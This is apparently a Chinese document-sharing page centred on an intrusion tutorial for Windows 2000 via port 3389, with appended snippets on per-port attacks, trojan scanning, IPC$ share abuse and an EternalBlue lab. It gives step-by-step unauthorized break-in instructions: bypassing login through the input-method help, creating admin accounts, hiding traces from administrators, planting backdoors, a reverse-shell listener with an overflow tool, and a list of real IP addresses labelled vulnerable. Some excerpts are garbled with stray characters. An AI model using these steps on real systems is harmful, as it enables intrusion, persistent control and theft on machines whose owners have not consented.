当前位置：搜档网 › 3389端口入侵图文教程

3389端口入侵图文教程

前言：由于微软对中国产品不付责任的态度，使得安装了终端服务和全拼的w2000 服务器存在着远程登陆并

能获取超级用户权限的严重漏洞。

3389端口简介：WIN2000中文简体版存在的输入法漏洞，可以使本地用户绕过身份验证机制而进入系统内部。

经实验，WIN2000中文简体版的终端服务，在远程操作时仍然存在这一漏洞，而且危害更大。

WIN2000的终端服务功能，能使系统管理员对WIN2000进行远程操作，采用的是图形界面，用户在远程控制

计算机时其功能与在本地使用一样，其默认端口为3389，用户只要装了WIN2000的客户端连接管理器就能与开

启了该服务的计算机相联。因此这一漏洞使终端服务成为

WIN2000的合法木马。

这次我们要用到的工具有：SUPERSCAN2.03 WIN2000终端服务客户端。推荐使用流光4.6

下面我们来看看是怎么入侵的。

第一步：我们现在要做的是找到一台存在3389端口漏洞的主机，这是我们可爱的SUPERSCAN上场的时候了，

如果您对SUPERSCAN不太熟悉的话，你按照上图的配置就行了，在开始处填上你要扫描的IP地址段，结束处填上

结束的IP地址段，如果你的网速和机器配置并不高的话，请不要扫描多个IP地址段。

第二步：假设我们现在已经得到一台存在3389漏洞的主机，现在我们要做的是进入到他的计算机中。这里我们

就要用到上面所说到的终端客户端连接器了连接了。如下图所示：

我们需要在服务器处填上我们刚才扫描得到的3389端口主机，屏幕区域：640*480 800*600 1024*768……这个

是你连接上去以后在你机器上显示的分辨率，建议为：

800*600。在启用数据压缩处打上勾。其他的就不用调整

了！就使用默认了！点连接，我们就可以看到熟悉的WIN2000登陆界面了！

第三步：我们要做的是利用输入法漏洞为我们创建一个用户，并加入到administrators中去，或者将guset激活。建议激活guset，因为这样不容易被网管发现。具体方法如下：

用终端连接器连接上几秒钟后，屏幕上显示出WIN2000登录界面（如果发现是英文或繁体中文版，放弃，另换

一个地址）。用CTRL+SHIFT快速切换输入法，切换至全拼，这时在登录界面左下角将出现输入法状态条（如

果没有出现，请耐心等待，因为对方的数据流传输还有一个过

程）。用右键点击状态条上的微软徽标，弹出

“帮助”（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞），下图中的计算

机依然存在3389漏洞，帮助我们还可以使用！:)如图一

图一

打开“帮助”一栏中“操作指南”，在最上面的任务栏点击右键，会弹出一个菜单，打开“跳至URL”。

此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如，该系统安装在Ｃ盘上，就在空白

栏中填入"c:\winnt\system32"。当然也不一定对方的2000是安装在C盘，如果出错的话，你可以用

file:///c:查看C盘的文件名，我就遇的很多用户装的是双操作系统，C装98，D装WIN2000，您可以根据具体

的位置定义跳转URL，我们这里的主机2000是安装在D盘上的，我们填入"d:\winnt\system32"如图三。然后按

“确定”，就会在右边窗口出现图四所示，点显示文件，于是我们就成功地绕过了身份验证，进入了系统的

SYSTEM32目录。

图三

图四

第四步：

现在我们要获得一个账号，成为系统的合法用户。在该目录下找到"net.exe"，为"net.exe"创建一个快捷方

式，右键点击该快捷方式，在“属性”－>“目标”

－>d:\winnt\system32\net.exe后面空一格，填入"user

guest active :yes"点“确定”。这一步骤目的在于用net.exe 激活被禁止使用的guest账户，当

然也可以利用"user 用户名密码／add"，创建一个新账号。当然方法有很多种。我们这里将带领各位建

立一个用户名为WINADMIN的用户，找到NET这个文件右键---创建快捷方式----属性----然后填加用户。如图五所示：

图五

上图中，我们建立了一个名字为WINADMIN的用户，然后就是改变WINADMIN的密码，用到的命令是：

net user winadmin xxxx XXXX是你要设置的密码！

运行后可能没有什么反映，但是实际上已经填加了这个用户了。

第五步：

上一步我们已经填加了WINADMIN这个用户，但是光有一个普通用户的权限是不够的，我们需要提升一下自己的权限，也就是把我们加到管理员组中去。如下图所示：

再运行一下，呵呵！现在我们已经可以进入他的电脑了。

第六步----连接到对方计算机上去

我们使用终端连接器连接上去，填上你刚才建立的用户和密码，然后…………总之就象使用你的电脑一样！

我们可以利用这台电脑为我们干很多事情，也可以当做跳板利用。如果他安装了IIS的话，你还可以放上个江湖！（我觉得还是先通知网管）

建议大家给在桌面上留下一个TXT文件，告诉他怎么修复，让他尽快补上漏洞！（又干了一件好事）

最后教大家一招，登陆进入以后local-machine->software-

>microsoft->winnt->currentversion->winlogon

DontDisplayLastUserName:1

修改注册表相应健值,这样网管就不会查到你了

防范方法：

1.最简单的一个防范方法就是删除帮助文件。具体方法是在搜索中查找输入法的帮助文件，可以利用的有：

PINTLGNT.CHM（微软拼音输入法），WINSP.CHM（双拼输入法帮助文件），WINZM.CHM（郑码输入法帮助文件

），WINPY.CHM（全拼输入法帮助文件）WINIME.CHM（输入法操作指南）将以上文件全部删除

2.https://www.sodocs.net/doc/b48301531.html,/downl..._SP2_x86_CN.EXE 安装输入法补丁

3.停止终端服务

各个端口的入侵方法(入侵菜鸟必看)

各个端口的入侵方法（入侵菜鸟必看）1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破（字典是关键）最后SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口（以上反向的，测试成功） sqlhelloz.exe 入侵ip 1433 （这个是正向连接） 2. 4899端口入侵用4899过滤器.exe，扫描空口令的机器 3. 3899的入侵对很早的机器，可以试试3389的溢出(win3389ex.exe) 对2000的机器，可以试试字典暴破。(tscrack.exe) 4. 80入侵对sp3以前的机器，可以用webdav入侵；对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）可以利用SQL进行注入。（小榕的注入软件）。 5. serv-u入侵(21端口）对5. 004及以下系统，可用溢出入侵。（serv5004.exe）对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）

====================================== 对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 6. 554端口用real554.exe入侵。 7. 6129端口用DameWare6129.exe入侵。 8. 系统漏洞利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，进行溢出入侵。 9. 3127等端口可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。 10. 其他入侵利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。各种端口的入侵方法1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破（字典是关键）最后SQLTool*.**e入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

网络安全技术简答题

第1章网络安全概述与环境配置 1. 网络攻击和防御分别包括哪些内容答：攻击技术主要包括以下几个方面。（1）网络监听：自己不主动去攻击别人，而是在计算机上设置一个程序去监听目标计算机与其他计算机通信的数据。（2）网络扫描：利用程序去扫描目标计算机开放的端口等，目的是发现漏洞，为入侵该计算机做准备。（3）网络入侵：当探测发现对方存在漏洞后，入侵到目标计算机获取信息。（4）网络后门：成功入侵目标计算机后，为了实现对“战利品”的长期控制，在目标计算机中种植木马等后门。（5）网络隐身：入侵完毕退出目标计算机后，将自己入侵的痕迹清除，从而防止被对方管理员发现。防御技术主要包括以下几个方面。（1）安全操作系统和操作系统的安全配置：操作系统是网络安全的关键。（2）加密技术：为了防止被监听和数据被盗取，将所有的数据进行加密。（3）防火墙技术：利用防火墙，对传输的数据进行限制，从而防止被入侵。（4）入侵检测：如果网络防线最终被攻破，需要及时发出被入侵的警报。（5）网络安全协议：保证传输的数据不被截获和监听。 2. 从层次上，网络安全可以分成哪几层每层有什么特点答：从层次体系上，可以将网络安全分成4个层次上的安全：物理安全，逻辑安全，操作系统安全和联网安全。物理安全主要包括5个方面：防盗，防火，防静电，防雷击和防电磁泄漏。

逻辑安全需要用口令、文件许可等方法来实现。操作系统安全，操作系统必须能区分用户，以便防止相互干扰。操作系统不允许一个用户修改由另一个账户产生的数据。联网安全通过访问控制服务和通信安全服务两方面的安全服务来达到。（1）访问控制服务：用来保护计算机和联网资源不被非授权使用。（2）通信安全服务：用来认证数据机要性与完整性，以及各通信的可信赖性。（感觉如果说是特点的话这样回答有点别扭。。） 3. 为什么要研究网络安全答：网络需要与外界联系，同时也就受到许多方面的威胁：物理威胁、系统漏洞造成的威胁、身份鉴别威胁、线缆连接威胁和有害程序威胁等。（可详细展开） 6. 网络安全橙皮书是什么包括哪些内容答：网络安全橙皮书是根据美国国防部开发的计算机安全标准——可信任计算机标准评价准则（Trusted Computer Standards Evaluation Criteria，TCSEC），1985年橙皮书成为美国国防部的标准，多年以来它一直是评估多用户主机和小型操作系统的主要方法。其他子系统（如数据库和网络）也一直用橙皮书来解释评估。橙皮书把安全的级别从低到高分成4个类别：D类、C类、B类和A类，每类又分几个级别，如表1-1所示。表1-1 安全级别

[黑客必学] 最基本的入侵步骤——送给新手

第一步下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”，2号软件就是著名的国产木马冰河2.2的控制端。下载完毕并解压缩之后跟我进行第二步! 第二步运行1号软件，首先出现的是“网络刺客II注册向导”，别理它，点击“稍后(Q)”就进入了网络刺客II的主界面。第三步在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”，就进入了“搜索因特网主机”界面。第四步进入“搜索因特网主机”界面后，“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选 “结束地址”栏填XXX.XXX.255.255其中XXX.XXX 择了，比如你可以选61.128或选61.200等等，的选择要和前面一样。“端口”栏填7626，其他栏保持默认不动。好了，以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了，再检查一下填对没有?如果一切OK，请点击“开始搜索”。第五步观察“总进度”和“段进度”是否在走动。如果没有走动，那一定是IP地址设置不对，请认真检查。如果两个进度都在走动，呵呵，你就成功一半了，至少你会使用网络刺客II 扫描网上开放某一端口的计算机了。下面你要作的就是静静的等待，学用黑客软件是需要耐心的。大约20-30分钟后，最下面的记录栏里就应该出现记录了(一般情况下，应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机，前面是该计算机的IP地址，后面是7626(冰河木马端口)。第六步点击“停止搜索”，但不要退出程序，到第十二步时还要用。运行2号软件冰河，进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。第七步在“添加主机”窗口，“显示名称”里填入第五步里搜索到的第一条IP地址，当IP地址填入“显示名称”里后，“主机地址”里就自动填入相同的IP了。“访问口令”不填，“监听端口”保持默认的7626。好了，检查一下IP有没有填错，如果OK，点击“确定”，在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。第八步这一步和下一步最重要，请认真看清楚!在冰河的主界面里，点击“文件管理器”里的“我的电脑”，这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如，如果你的硬盘分的是四个区，“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:，如果你的硬盘分的是两个区，就会出现C:、D:。第九步点击“文件管理器”里刚才输入的第一条IP地址，稍等片刻(网速慢的情况下约10-30秒)，在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看到了?呵呵，祝贺你，你已经成功地进入对方的计算机了!!!!! 第十步你发现没有出现对方计算机的硬盘分区!!呵呵，别急，看看冰河主界面最下端的状态栏里有什么提示，如果是下面两种情况，就放弃，返回第七步，填入搜索到的第二条IP地址:

解决远程桌面无法连接问题实例说明

常见提示如下：客户端无法建立跟远程计算机的连接。导致这个错误的可能的原因是: 1) 远程计算机上的远程连接可能没有启用。 2) 已超出远程计算机上的连接最大数。 3) 建立连接时出现了一个网络错误。具体的解决办法：有时候是这个错误提示：由于网络错误，连接被中断，请重新连接到远程计算机远程连接我肯定是开启了的，防火墙里面3389端口也是打开的，并且连接其他的服务器就可以连接上，说明我本机没问题，用扫描软件，扫描了一下这个服务器，显示IP和端口都是存在的，说明这个服务器网络也没问题，实在没办法，只有不断的测试，后来在系统日志里面看到很多条系统错误信息。其中：严重错误“RDP 协议组件 "DA TA ENCRYPTION" 在协议流中发现一个错误并且中断了客户端连接。”引起了我的主要。几经周折得知这是因为Certificate子键负责终端服务通信中数据信息的认证和加密，它一旦被损坏，终端服务的协议组件就会检测到错误，中断客户机与终端服务器之间的通信。导致Certificate子键损坏的原因很多，如管理员安装和卸载某些系统软件、对终端服务参数的不合理配置等。这时我们需要重置该键值中的内容，才能修复终端服务。进入注册表编辑器窗口，展开“HKEY_LOCAL_MA CHINE\ SYSTEM\CurrentCon trolSet\Services\TermService\ Parame ters”，找到名为“Cer tificate”的子键，将它删除，重新启动XP系统或Windows 2000 Server服务器

，系统就会重新生成“Certificate”子键，这样客户端就能正常连接到终端服务器了。在终端服务器出现无法连接的问题后，我们首先要判断这是不是网络故障引起的，检测远程客户端和XP系统 (Windows 2000 Server服务器)是否能够正常连接到网络；然后就要检查终端服务器的加密级别是否设置过高。排除上述原因后，就有可能是“Certificate”子键损坏了。此外，“HKEY_LOCAL _MACHINE\ SYSTEM\Cur rentControlSet\Services\Term Service\Parameters”下的“X509 Certificate”和“X509 Certificate ID” 损坏了也有可能导致终端服务出现问题，它们的修复方法与“Certificate”子键损坏后的修复方法相同。讲开了，另外将其他几种远程连接的错误解决方法也附上，以方便需要的朋友：提示“本地计算机客户端访问许可不能升级或更新”的解决方法 1、打开被控机的注册表编辑器，定位到HKLM\SOFTWARE\Microsoft\MSLicensing。 2、备份MSLicensing键。 3、删除MSLicensing键，重启系统。提示“客户端无法连接到远程计算机”。远程计算机不可到达（ping不通或者被中途的园区网防火墙挡住），或是被控机防火墙没有开相应的端口，或是根本没有开启服务端。提示“远程计算机已结束连接”。的解决方法 1、打开被控机的注册表编辑器，定位到HKLM\SYSTEM\ControlSet001\Enum\Root\RDPDR，备份该项；右键单击该项，选择“权限”，为当前登录的用户增添“完全控制”的权限。 2、新建key文件，将以下内容写入，双击导入注册表后重启计算机即可。 Windows Registry Editor V ersion 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\RDPDR\0000] "ClassGUID"="{4D36E97D-E325-11CE-BFC1-08002BE10318}" "Class"="System" "HardwareID"=hex(7):52,00,4f,00,4f,00,54,00,5c,00,52,00,44,00,50,00,44,00,52,\ 00,00,00,00,00 "Driver"="{4D36E97D-E325-11CE-BFC1-08002BE10318}\\0030" "Mfg"="(标准系统设备)"

常用的端口入侵

21端口： 21端口是默认的FTP端口，利用方式：弱口令探测/溢出目前我还没看到远程溢出的，SERU的本地溢出漏洞风靡一时，曾经很多服务器就在沦丧于这个漏洞。 22端口 22端口是SSH远程登录协议，利用方式：弱口令探测 23端口 23端口是TLENET的默认端口，利用方式：弱口令探测/溢出一般大家用弱口令探测得比较多，但是成功率比较低，还是溢出来得快，毕竟权限高，想做什么都可以！ 25端口 25端口是SMTP协议的默认端口，邮件接收服务器。利用方式：溢出 53端口 53端口是DNS服务的默认端口，提供域名服务器，利用方式：溢出。这个今年很火，我试了一下，一晚上差不多可以溢出10W台开几抬肉鸡的话 79端口 79端口Finger服务的默认端口(查询远程主机在线用户等信息)，可以在辅助入侵中获取更多的主机信息。利用FINGER服务可以查询到主机很多敏感的信息，在入侵的时候常常可以起到意想不到的作用。

80端口 80端口是IIS的默认端口，全球信息网超文本传输协议(www)。利用方式：IIS溢出/SQL注入/旁注/跨站。不过一部分路由器的远程管理端口也是80。SQL注入大家已经很熟悉了吧，IIS溢出也只存在那些很老的机器上，看运气了。 110端口 110端口提供 Pop3 服务。邮件发送服务器。利用方式：溢出。 135端口 135端口提供查询服务。利用方式：IPC$(Internet Process Connection)入侵。网上教程非常多，不多说了。 137端口 137端口统共NetBIOS 数据报(UDP)服务。 139端口 139端口提供共享资源服务(NetBios-SSN)，用在IPC$入侵中。上面这三个端口可以综合利用。 161端口 161端口是远程管理设备(SNMP)的默认端口。这个很多小菜不知道怎么利用，那么重点来说说这个。 SNMP是简单网络管理协议，不清楚百度一下，很多小菜扫描出来了SNMP的弱口令，比如private,public等等，但是不知道怎么利用，这里介绍两款工具：IP NetWork browse 和LANguard NetWork Scnaner,这两个工具都可以扫描SNMP，而且可以扫描到，磁盘，服务，

端口对应表

端口：6970 服务：RealAudio 说明：RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP-7070端口外向控制连接设置的。端口：7323 服务：[NULL] 说明：Sygate服务器端。端口：8000 服务：OICQ 说明：腾讯QQ服务器端开放此端口。' 端口：8010 服务：Wingate 说明：Wingate代理开放此端口。端口：8080 服务：代理端口说明：WWW代理开放此端口。端口：137 说明：SQL Named Pipes encryption over other protocols name lookup(其他协议名称查找上的SQL命名管道加密技术)和SQL RPC encryption over other protocols name lookup(其他协议名称查找上的SQL RPC加密技术)和Wins NetBT name service(WINS NetBT名称服务)和Wins Proxy都用这个端口。端口：161 说明：Simple Network Management Protocol(SMTP)（简单网络管理协议）端口：162 说明：SNMP Trap（SNMP陷阱）端口：21 服务：FTP 说明：FTP服务器所开放的端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash 和Blade Runner所开放的端口。端口：22 服务：Ssh 说明：PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点，如果配置成特定的模式，许多使用RSAREF库的版本就会有不少的漏洞存在。端口：23 服务：Telnet 说明：远程登录，入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行

135端口入侵的方法(简单)

135端口入侵的方法(简单) （1）通过135端口入侵，攻击者首先需要查找网络上存在135端口漏洞的主机地址，在查找此类主机过程中，可以使用一些扫描工具，比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址，然后在“结束”文本框里填写好扫描结束的IP地址，在“扫描类型”选项中选择“所有端口定义”单选按钮，并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后，在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径，把里面有漏洞的IP整理下即可。（2）得到有漏洞后，我们还有一个功能强大的扫描工具，比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径，在连接共享$处选择“WMI扫描”，在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。（3）获得漏洞主机用户名以后，我们需要一个开启的工具，那就是Recton v2.5。好了，万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处，以及用户名和密码，不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车，会提示让你输入用户名，把用户名输入后，回车即可进入主机。而且得到的还是SYSTEM 权限。下一步就是为我们加了拥有管理员权限的用户，看看我杰作。最后我们可以上传一些远程性木马软件作为后门，比如灰鸽子，冰河等。在这里我就不在展示。我还是喜欢3389端口，那我就给他上传个开启3389的脚本，不过对于开启3389端口的工具网上还真的不少，比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的

常用黑客工具(网络入侵工具)

常用黑客工具（网络入侵工具）一、扫描工具 X-scan 3.1 焦点出的扫描器，国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具，有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011 远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”，无需安装，非常小巧（仅23KB），具有极快的扫描速度! WebDAVScan v1.0 针对WEBDA V漏洞的扫描工具! 注意:该软件解压缩时会被查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 二、远程控制

黑客常用的几种入侵端口的方法

【托管服务qin】黑客常用的几种入侵端口的方法服务器托管, BGP, 光钎专线, 防火墙, 新一代IDC 工欲善其事，必先利其器，本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法，希望能对大家有所帮助，以助于大家能更好地防御黑客的攻击。" ^' D( E3 K! N) ^! c 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破（字典是关键）7 L5 a9 T" E: C& x' k* C 最后SQLTools.exe入侵4 r+ F" q g9 j- K9 m* x4 o' E =============================2 z0 ~3 T) K5 n8 W; Z 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口（以上反向的，测试成功）) Q) Q7 K+ L! J$ o6 Z9 w( a sqlhelloz.exe 入侵ip 1433 （这个是正向连接）% J3 L6 x8 y: t; p 2. 4899端口入侵9 `" f0 r# k2 ^: F 用4899过滤器。exe，扫描空口令的机器 3. 3899的入侵对很早的机器，可以试试3389的溢出（win3389ex.exe）对2000的机器，可以试试字典暴破。（tscrack.exe）* X8 }: O! |2 }& x7 M 4. 80入侵+ J9 [0 L4 _) B! K 对sp3以前的机器，可以用webdav入侵；

3389端口介绍

端口介绍： 3389端口是Windows 2000(2003) Server 远程桌面的服务端口，可以通过这个端口,用"远程桌面"等连接工具来连接到远程的服务器，如果连接上了，输入系统管理员的用户名和密码后，将变得可以像操作本机一样操作远程的电脑，因此远程服务器一般都将这个端口修改数值或者关闭。 3389端口的关闭：首先说明3389端口是windows的远程管理终端所开的端口，它并不是一个木马程序，请先确定该服务是否是你自己开放的。如果不是必须的，建议关闭该服务。 win2000 server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项，选中属性选项将启动类型改成手动，并停止该服务。 win2000 pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services服务项，选中属性选项将启动类型改成手动，并停止该服务。 windows xp关闭的方法：在我的电脑上点右键选属性-->远程，将里面的远程协助和远程桌面两个选项框里的勾去掉。通过注册表关闭3389端口开始---运行输入regedit打开注册表 [HKEY_LOCAL_MACHINE\System\currentcontrolset\control\Terminalser ver\wds\rdpwd\tds\tcp分支，选中名为portnumber的键值,将其3389改为其他（如1234）看我操作这里control有2个分别为controlSET001 和controlSET002我一个一个来先进controlSET001在来controlSET002 下面我们在看currentcontrolset [HKEY_LOCAL_MACHINE\System\currentcontrolset\control\Terminalser ver\winstations\RDP-Tcp\PortNumber分支里应该有一个或者很多类似的子键，一样的改他的值3389为其他（如1234）将远程桌面端口修改成其他端口号修改服务器端的端口设置，注册表有2个地方需要修改。 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] PortNumber值，默认是3389，修改成所希望的端口，就如你所说该成6222。第二个地方： [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal

139端口入侵简易教程

139端口入侵简易教程; net use \\192.168.0.1\ipc$ "" /user:administrator 提到139端口，我想知道的人一定非常多，本来是不想用写这个教程的，但考虑要照顾到新人，所以还是简单的写一下。首先，连接的命令是： net<空格>use<空格>\\IP地址\ipc$<空格>密码<空格>/user:用户名假设我要连接的目标IP地址是：192.168.1.11，用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的： net use \\192.168.1.11\ipc$ 123456 /user:google 如果连接成功，那么系统会提示"命令成功完成"! 空密码是这样的：如果密码是空的，那就在原先输入密码的地方以""代替。开始查看权限：查看登录后用户权限的方法很简单，只要给目标系统传个文件就可以了，如果传诵成功，那么一般都是系统管理员权限了，如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的： copy<>文件绝对路径<>\\IP地址\文件目标路径比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下： copy c:\a.exe \\192.168.1.11\d$ 要注意"$"符，那是隐藏共享盘的表示符，如果对方的共享盘不是隐藏的，就不需要"$"符了。如果命令执行成功，系统同样会提示"已复制1 个文件" 小技巧：再次复制相同文件至相同路径，以检测是否存在杀毒软件！！！如果系统提示“改写\\192.168.1.11\d$\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上，没有被杀毒软件查杀（一般发送过去的都是后门程序只类的东西，只有系统安装了杀毒软件都会被杀掉）。如果没有提示，则说明安装了杀毒软件。

3389端口及一些漏洞主机

202.103.207.208 202.103.207.217 202.103.207.213 202.103.208.247 202.103.209.104 202.103.209.166 202.103.209.178 202.103.209.184 202.103.209.185 202.103.209.175 202.103.209.171 202.103.209.169 202.103.210.36 202.103.210.150 202.103.210.178 202.103.210.184 202.103.210.181 202.103.211.14 202.103.211.103 202.103.211.110 202.103.211.176 202.103.211.189 202.103.211.254 202.103.223.123 202.103.223.241 202.103.223.234 202.103.223.246 202.103.223.245 202.103.223.247 202.103.223.248 202.103.225.74 202.103.225.76 202.103.225.80 202.103.225.82 202.103.225.194 202.103.238.9 202.103.238.16 202.103.238.25 202.103.238.27 202.103.238.22 202.103.238.37 202.103.238.26 202.103.238.28

202.103.238.85 202.103.238.137 202.103.238.130 202.103.238.185 202.103.239.124 202.103.239.125 202.103.239.134 202.103.239.213 202.103.239.153 202.103.239.126 202.103.239.123 202.103.239.146 202.103.240.34 202.103.239.229 202.103.239.234 202.103.240.199 61.139.219.165 61.139.219.186 61.139.219.189 61.139.219.187 61.139.219.240 61.139.247.196 218.65.132.20 218.65.132.21 218.65.171.94 218.65.213.19 218.65.214.186 218.65.226.249 218.65.227.48 218.65.230.151 218.65.230.125 218.65.230.162 218.65.230.139 218.65.230.126 218.65.230.228 218.65.230.230 218.65.230.204 218.65.231.31 218.65.246.228 218.21.64.5 218.21.64.37 218.21.64.57 218.21.64.89

135端口入侵

实验5 135端口入侵一、实验目的通过这项实验旨在使学生对135端口入侵有一定的了解，提高同学们的安全意识，掌握配置安全系统的能力。二、实验任务任务性质：黑客攻防三、任务描述：扫描局域网中开放的135端口，运用工具，开启telnet服务，登录对方主机，放入木马。四、任务步骤：（1）用x-san扫描主机，发现开启135端口主机；（2）用ntscan扫描开启135端口主机，telnet登录密码是否为空；（3）发现telnet登录密码为空的主机，用recov启动telnet服务；（4）建立ftp服务器，将木马放入ftp服务器；（5）通过telnet登录ftp服务器，将木马上传上目标主机，并运行；（6）肉鸡完成。五、总结关闭135端口，445端口，139端口，3389端口的方法。端口关闭前查看开启端口：

1、关闭445端口经过注册表更改 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NetBT\Parameters] [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NetBT\Parameters] 在“Parameters”项上，右键单击，选择“新建”——“DWORD值”。将DWORD值命名为“SMBDeviceEnabled”。右键单击“SMBDeviceEnabled”值，选择“修改”。在“数值数据”下，输入“0”，单击“确定”按钮。 2、关闭135端口经过注册表更改（1）在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole] 项中把EnableDCOM的值改为“N” （2）在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc] 项中把DCOM Protocols 键值中删除 “ncacn_ip_tcp” （3）停用“Distributed Transaction Coordinator”服务 3、关闭3389 端口（1）在我的电脑上点右键选属性-->远程，将里面的远程协助和远程桌面两个选项框里的勾去掉

永恒之蓝3389漏洞原理详解解析

实验环境 ?操作机：Windows XP o IP : 172.16.11.2 ?操作机：Kali Linux o IP : 172.16.12.2 ?目标机：Windows 7 64位 o IP : 172.16.12.3 ?目标机：Windows Server 2003 o IP : 172.16.12.4 ?掌握工具的用法以及临时防御措施实验步骤实验工具 ?Metasploit：是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程等 ?Equation Group Tools：这是一个集成的工具包，里面包含了IIS6.0、445端口、3389端口、Rootkit等远程利用工具，本次试验我们主要用到它的445端口远程入侵功能，以及3389远程端口入侵功能。实验内容 Shadow Brokers再次暴露出一份震惊世界的机密文档，其中包含了多个W indows 远程漏洞利用工具，可以覆盖大量的Windows 服务器，一夜之间所有Windows服务器几乎全线暴露在危险之中，任何人都可以直接下载并远程攻击利用，考虑到国内不少高校、政府、国企甚至还有一些互联网公司还在使用W indows 服务器，这次事件影响力堪称网络大地震。影响版本

全球70% 的Windows 服务器，包括Windows NT、Windows 2000、Windo ws XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 200 8、Windows 2008 R2、Windows Server 2012 SP0 危害攻击者通过执行脚本，使目标主机蓝屏重启，获取Windows目标主机权限，对目标机器进行任意操作，攻击成本和利用条件都很低，只需在本地执行脚本，并设置相关参数。一旦攻击成功，攻击者能直接控制目标主机，甚至直接下载数据库，盗取商业机密，很多的政府、事业单位都会受到影响，影响极大，危害不言而喻。步骤1：利用Eternalblue与Doublepulsar插件，验证445 SMB漏洞我们本步骤利用Eternalblue和Doublepulsar这两个"插件"来获取Windows 7 64位的系统权限。其中Eternalblue可以利用SMB漏洞，获取Windows 7 系统权限而Doublepulsar可以加载Metasploit生成的恶意DLL。我们首先进入cmd命令行，在命令行中进入文件夹： cd C:\EQGRP_Lost_in_Translation-master/Windows 输入命令： fb.py 